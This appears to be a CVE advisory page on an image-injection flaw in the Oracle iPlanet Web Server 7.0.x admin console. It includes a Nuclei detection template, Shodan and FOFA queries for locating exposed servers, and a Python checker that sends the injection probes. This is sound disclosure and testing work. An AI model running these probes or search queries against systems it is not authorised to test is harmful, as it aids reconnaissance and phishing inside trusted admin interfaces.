CVE-2020-9314: Oracle iPlanet Web Server 7.0.x - Image Injection

Date: 2026-01-24 | Affected software: Oracle iPlanet Web Server | PoC: public

Vulnerability description

Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI: an attacker-supplied URL is reflected into the masthead image source, so the console renders content from a host the attacker controls. This issue exists because of an incomplete fix for CVE-2012-0516. Per the CVSS vector in the PoC below (PR:H, UI:R, scope changed), the attacker already needs high privileges and a user must open the crafted link; the impact is interface manipulation and phishing inside the trusted admin UI rather than code execution.

PoC code [public] (Nuclei template)

id: CVE-2020-9314

info:
  name: Oracle iPlanet Web Server 7.0.x - Image Injection
  author: DhiyaneshDk
  severity: medium
  description: |
    Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.
  impact: |
    Attackers can inject malicious images into the admin console, potentially leading to social engineering, phishing attacks, or interface manipulation.
  remediation: |
    Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.
  reference:
    - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
    - http://seclists.org/fulldisclosure/2020/May/31
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2020-9314
    cwe-id: CWE-79
    epss-score: 0.41294
    epss-percentile: 0.97278
  metadata:
    verified: false
    max-request: 2
    vendor: oracle
    product: iplanet_web_server
    shodan-query: "Oracle-iPlanet-Web-Server"
    fofa-query: app="Oracle-iPlanet-Web-Server"
  tags: cve,cve2020,oracle,iplanet,injection

http:
  - method: GET
    path:
      - "{{BaseURL}}/admingui/version/Version?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"
      - "{{BaseURL}}/admingui/version/Masthead.jsp?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "productNameSrc"
          - "Oracle iPlanet"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 490a0046304402203da2b067ec8f0e43cde82be6438be13653138736f0f90c1316bb9dc8c4d6a5710220093946bbae397a022cb6328a4faafcbd63be8793b23baa0881d2aca4ea9f0332:922c64590222798bb761d5b6d8e72950
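The template above sends the two admingui URIs with productNameSrc pointing at an interactsh host and then requires an out-of-band HTTP hit plus two body strings. The stand-alone checker below is an added example, not code from the page, from Oracle or from the template author: it builds the same two probe URLs, and instead of waiting for an out-of-band callback it parses the response and confirms that the injected URL actually lands in an <img src> attribute, which is what "image injection" means here. The base URL, the callback host name and the sample HTML response are constructed for illustration; the real masthead markup is not on this page, so the sample only reproduces the two strings the template matches on.

```python
"""Stand-alone reflection check for CVE-2020-9314 (Oracle iPlanet Web Server
7.0.x admin console image injection). Added example, not the page's own code.
Mirrors the Nuclei template's probes; verifies reflection into <img src>."""
import sys
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# Paths taken from the Nuclei template on this page.
ADMINGUI_PATHS = (
    "/admingui/version/Version",
    "/admingui/version/Masthead.jsp",
)


def build_probe_urls(base_url, callback_host, image="test.jpg", size=500):
    """Return (probe URLs, injected image URL) for the two admingui paths.

    callback_host is a host you control (the template uses interactsh);
    the query is URL-encoded, which the server decodes identically."""
    src = f"http://{callback_host}/{image}"
    query = urllib.parse.urlencode({
        "productNameSrc": src,
        "productNameHeight": size,
        "productNameWidth": size,
    })
    return [f"{base_url.rstrip('/')}{p}?{query}" for p in ADMINGUI_PATHS], src


class _ImgSrcCollector(HTMLParser):
    """Collect src attributes of <img> tags; tolerant of sloppy JSP output."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())


def reflected_img_srcs(body):
    """All <img src> values found in an HTML body."""
    parser = _ImgSrcCollector()
    parser.feed(body)
    return parser.srcs


def is_vulnerable(status, body, injected_src):
    """Apply the template's conditions (200, both body words) plus a stricter
    one: the injected URL must appear as an <img src>, not merely be echoed."""
    if status != 200:
        return False
    if "productNameSrc" not in body or "Oracle iPlanet" not in body:
        return False
    return injected_src in reflected_img_srcs(body)


def probe(base_url, callback_host, timeout=10):
    """Live check against a target; stops at the first matching path, like the
    template's stop-at-first-match. Returns the matching URL or None."""
    urls, src = build_probe_urls(base_url, callback_host)
    for url in urls:
        req = urllib.request.Request(url, headers={"User-Agent": "cve-2020-9314-check"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
                if is_vulnerable(resp.status, body, src):
                    return url
        except Exception as exc:  # connection/HTTP error: try the other path
            print(f"{url}: {exc}", file=sys.stderr)
    return None


# Constructed sample response (not captured from a real server): a masthead
# that reflects productNameSrc into an <img> tag and echoes the parameter name.
SAMPLE_BODY = """<html><head><title>Oracle iPlanet Web Server 7.0</title></head>
<body><div class="masthead">
<img src="http://callback.example/test.jpg" height="500" width="500">
<input type="hidden" name="productNameSrc" value="http://callback.example/test.jpg">
</div></body></html>"""


if __name__ == "__main__":
    if len(sys.argv) == 3:
        hit = probe(sys.argv[1], sys.argv[2])
        print("vulnerable:", hit or "no reflection observed")
    else:
        _, injected = build_probe_urls("https://target.example:8989", "callback.example")
        print("sample reflects injected src:", is_vulnerable(200, SAMPLE_BODY, injected))
```

Run it as `python3 check.py https://host:port callback.example` against a target you are authorised to test; without arguments it evaluates the embedded sample. Checking the parsed <img src> rather than a substring match avoids a false positive when the parameter value is only echoed in a hidden field or error message, which the template's body matcher alone would accept.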
